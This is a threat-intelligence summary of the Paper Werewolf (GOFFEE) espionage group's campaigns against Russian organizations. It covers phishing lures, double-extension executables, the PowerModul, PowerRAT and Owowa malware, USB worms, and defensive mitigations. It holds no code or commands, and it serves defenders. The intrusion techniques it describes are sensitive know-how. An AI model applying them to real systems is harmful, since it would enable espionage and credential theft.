Full Report
The threat actor known as Paper Werewolf has been observed exclusively targeting Russian entities with a new implant called PowerModul. The activity, which took place between July and December 2024, singled out organizations in the mass media, telecommunications, construction, government entities, and energy sectors, Kaspersky said in a new report published Thursday. Paper Werewolf, also known
Analysis Summary
# Threat Actor: Paper Werewolf (GOFFEE)
## Attribution & Identity
* **Primary Name:** Paper Werewolf
* **Aliases:** GOFFEE
* **Associated Groups:** Mentioned in context alongside Sapphire Werewolf (a distinct group attributed to a separate phishing campaign by BI.ZONE).
## Activity Summary
* **Observed Activity Window:** July to December 2024 (for the latest campaigns). Total campaigns tracked since 2022.
* **Historical Campaigns:** Assessed to have conducted at least seven campaigns since 2022.
* **Recent Operations:** Attacks initiated via phishing emails containing macro-laced lure documents or RAR archives with deceptive, double-extension executables masquerading as PDF or Word files. A key feature of some intrusions is the inclusion of a *disruptive component* aimed at changing employee account passwords, going beyond standard espionage.
## Tactics, Techniques & Procedures
* **Initial Access:**
* Phishing emails using macro-laced lure documents (Word documents with malicious VBA scripts used for the first time recently).
* Malicious RAR archives containing an executable that uses double extensions (`*.pdf.exe` or `*.doc.exe`).
* **Execution:**
* Initial execution leads to the deployment of a PowerShell-based Remote Access Trojan (RAT) called **PowerRAT** or the deployment of the new implant **PowerModul** (a PowerShell script capable of receiving further PowerShell scripts).
* Infection chain involving patching system files (`explorer.exe` or `xpsrchvw.exe`) with malicious shellcode to deploy an obfuscated Mythic agent.
* **Persistence/Command and Control:**
* Use of **PowerModul** and **PowerTaskel** to execute commands and receive payloads from the C2 server.
* Recent trend observed: Increasing abandonment of PowerTaskel in favor of the binary **Mythic agent** for lateral movement.
* **Credential Access & Exfiltration:**
* Use of the malicious IIS module **Owowa** to retrieve Microsoft Outlook credentials entered by users on the web client.
* Lateral movement utilities, including the use of **PsExec** for privilege escalation by PowerTaskel.
* **Defense Evasion:**
* Deception: Showing a decoy file (downloaded from a remote server) to the user while infection proceeds in the background.
## Targeting
* **Sectors:** Mass media, telecommunications, construction, government entities, and the energy sector. Financial organizations were also historically targeted.
* **Geography:** Exclusively targeting Russian entities.
* **Victims:** Government, energy, financial, and media organizations within Russia.
## Tools & Infrastructure
* **Malware Families Used:**
* **PowerModul:** Primary PowerShell implant used since early 2024.
* **PowerRAT:** PowerShell-based RAT used for initial deployment.
* **PowerTaskel:** Tool similar to PowerModul, used for executing C2 scripts and check-ins.
* **Mythic Agent/Framework:** Custom versions deployed post-initial access (e.g., obfuscated Mythic agent via shellcode).
* **QwakMyAgent:** Additional payload delivered.
* **Owowa:** Malicious IIS module for credential harvesting.
* **FlashFileGrabber / FlashFileGrabberOffline:** Used to steal files from removable media, with the offline variant copying specific file types to `%TEMP%\CacheStore\connect\`.
* **USB Worm:** Capable of infecting removable media with a copy of PowerModul.
* **Infrastructure:** Command-and-Control (C2) servers are used to deliver payloads and receive data. (No specific URLs or IPs were provided in the text to defang).
## Implications
Paper Werewolf (GOFFEE) remains an active and evolving threat primarily focused on disruptive espionage within Russia. Their latest observed activities show a preference for using native PowerShell capabilities (PowerModul/PowerTaskel) and adopting bleeding-edge open-source frameworks (Mythic agent) for execution and lateral movement, increasing operational flexibility and detection avoidance. The intentional disruption (password changes) adds a layer of operational impact beyond simple data theft.
## Mitigations
* **Email Security:** Enhance filtering for macro-laced documents and RAR archives, especially those exhibiting double extensions. Implement macro restrictions across the organization.
* **Endpoint Detection & Response (EDR):** Monitor for PowerShell execution patterns consistent with RAT activity (PowerRAT, PowerModul execution) and suspicious use of legitimate binaries like PsExec for privilege escalation.
* **Application Hardening:** Review IIS configurations and monitor for suspicious third-party modules being loaded to prevent credential harvesting like that done by Owowa.
* **Data Handling:** Implement strict policies regarding removable media insertion, given the actor's use of USB Worms and FlashFileGrabber components targeting flash drives.
* **Identity Protection:** Employ Multi-Factor Authentication (MFA) across all critical employee accounts to mitigate the impact of credential theft and account disruption through password changes.